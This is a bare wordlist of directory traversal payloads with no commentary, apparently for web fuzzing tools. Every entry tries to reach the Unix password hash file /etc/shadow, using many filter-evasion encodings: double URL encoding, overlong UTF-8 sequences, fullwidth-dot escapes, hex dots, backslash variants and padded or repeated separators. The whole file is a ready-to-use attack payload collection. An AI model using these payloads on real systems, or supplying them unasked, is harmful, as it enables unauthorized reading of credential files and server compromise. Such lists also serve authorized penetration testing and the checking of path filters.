%252e%252e%252f%252e%252e%252f%252e%252fetc%252fshadow
%252e%252e%252f%252e%252fetc%252fshadow
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cshadow
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cshadow
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cshadow
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cshadow
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cshadow
%252e%252e%255c%252e%252e%255cetc%255cshadow
%252e%252e%255cetc%255cshadow
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/shadow
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/shadow
%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/shadow
%252e%252e/%252e%252e/%252e%252e/etc/shadow
%252e%252e/%252e%252e/etc/shadow
%252e%252e/etc/shadow
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\shadow
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\shadow
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\shadow
%252e%252e\%252e%252e\etc\shadow
%252e%252e\etc\shadow
%252e%252fetc%252fshadow
%252fetc%252fshadow
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afshadow
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afshadow
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afshadow
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afshadow
%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cshadow
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/shadow
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/shadow
%25c0%25ae%25c0%25ae/etc/shadow
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\shadow
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\shadow
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\etc\shadow
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow
%2e%2e%2f%2e%2e%2fetc%2fshadow
%2e%2e%2fetc%2fshadow
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
%2e%2e%5c%2e%2e%5cetc%5cshadow
%2e%2e%5cetc%5cshadow
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%2e%2e/%2e%2e/%2e%2e/etc/shadow
%2e%2e/%2e%2e/etc/shadow
%2e%2e/etc/shadow
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\shadow
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\shadow
%2e%2e\%2e%2e\%2e%2e\etc\shadow
%2e%2e\%2e%2e\etc\shadow
%2e%2e\etc\shadow
%32%65%32%65%32%66fetc%32%66shadow
%32%65%32%65/etc/shadow
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%2fshadow
%c0%2e%c0%2e%c0%2fetc%2fshadow
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%5cshadow
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cetc%5cshadow
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/shadow
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/etc/shadow
%c0%2e%c0%2e\%c0%2e%c0%2e\etc\shadow
%c0%2e%c0%2e\etc\shadow
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow
%c0%ae%c0%ae%c0%afetc%c0%afshadow
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cshadow
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cshadow
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cshadow
%c0%ae%c0%ae%c1%9cetc%c1%9cshadow
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow
%c0%ae%c0%ae/etc/shadow
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\shadow
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\shadow
%c0%ae%c0%ae\%c0%ae%c0%ae\etc\shadow
%c0%ae%c0%ae\etc\shadow
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/shadow
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/shadow
%uff0e%uff0e\%uff0e%uff0e\etc\shadow
%uff0e%uff0e\etc\shadow
..%252f%252fetc%252fshadow
..%252f..%252f%252fetc%252fshadow
..%252f..%252f..%252f%252fetc%252fshadow
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255cshadow
..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255cshadow
..%255c..%255c..%255c..%255cetc%255cshadow
..%255c..%255c..%255cetc%255cshadow
..%255c..%255cetc%255cshadow
..%255cetc%255cshadow
..%25c0%25af..%25c0%25af..%25c0%25afetc%25c0%25afshadow
..%25c0%25af..%25c0%25afetc%25c0%25afshadow
..%25c0%25afetc%25c0%25afshadow
..%25c1%259c..%25c1%259c..%25c1%259cetc%25c1%259cshadow
..%25c1%259c..%25c1%259cetc%25c1%259cshadow
..%25c1%259cetc%25c1%259cshadow
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
..%2f..%2f..%2f..%2fetc%2fshadow
..%2f..%2f..%2fetc%2fshadow
..%2f..%2fetc%2fshadow
..%2fetc%2fshadow
..%32%66fetc%32%66shadow
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow
..%5c..%5c..%5c..%5cetc%5cshadow
..%5c..%5c..%5cetc%5cshadow
..%5c..%5cetc%5cshadow
..%5cetc%5cshadow
..%c0%2f..%c0%2fetc%2fshadow
..%c0%2fetc%2fshadow
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%5cshadow
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cetc%5cshadow
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afshadow
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afshadow
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afshadow
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afshadow
..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cshadow
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cshadow
..%c1%9c..%c1%9cetc%c1%9cshadow
..%c1%9cetc%c1%9cshadow
........................................................................../../../../../../../../etc/shadow
........................................................................../../../../../../../etc/shadow
..........................................................................\..\etc\shadow
..........................................................................\etc\shadow
..../..../..../..../..../..../..../..../etc/shadow
..../..../..../..../..../..../..../etc/shadow
....\....\etc\shadow
....\etc\shadow
.../.../.../.../.../.../.../.../etc/shadow
.../.../.../.../.../.../.../etc/shadow
...\...\etc\shadow
...\etc\shadow
../../../../../../../../etc/shadow
../../../../../../../etc/shadow
../../../../../../etc/shadow
../../../../../etc/shadow
../../../../etc/shadow
../../../etc/shadow
../..//../..//../..//../..///etc/shadow
../..//../..//../..//../..//etc/shadow
../..//../..//../..//..///etc/shadow
../..//../..//../..//../etc/shadow
../../etc/shadow
..//..//etc/shadow
..///..///..///..///..///..///..///..///etc/shadow
..///..///..///..///..///..///..///etc/shadow
..//etc/shadow
../etc/shadow
..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\etc\shadow
..\..\..\..\etc\shadow
..\..\..\etc\shadow
..\..\\\etc\shadow
..\..\\etc\shadow
..\..\etc\shadow
..\\..\\etc\shadow
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\etc\shadow
..\\\..\\\..\\\..\\\..\\\..\\\..\\\etc\shadow
..\\\etc\shadow
..\\etc\shadow
..\etc\shadow
./.././.././.././.././.././.././.././../etc/shadow
./.././.././.././.././.././.././../etc/shadow
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//etc/shadow
.//..//.//..//.//..//.//..//.//..//.//..//.//..//etc/shadow
./\/././\/./etc/shadow
./\/./etc/shadow
.\..\.\..\etc\shadow
.\..\etc\shadow
.\/\.\.\/\.\etc\shadow
.\/\.\etc\shadow
.\\..\\.\\..\\etc\shadow
.\\..\\etc\shadow
/..\/..\/..\/..\/..\/..\/..\/..\etc\shadow
///%2e%2e%2f%2e%2e%2fetc%2fshadow
///%2e%2e%2fetc%2fshadow
0x2e0x2e/0x2e0x2e/etc/shadow
0x2e0x2e/etc/shadow
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\shadow
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\etc\shadow
\../\../etc/shadow
\../etc/shadow
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cshadow
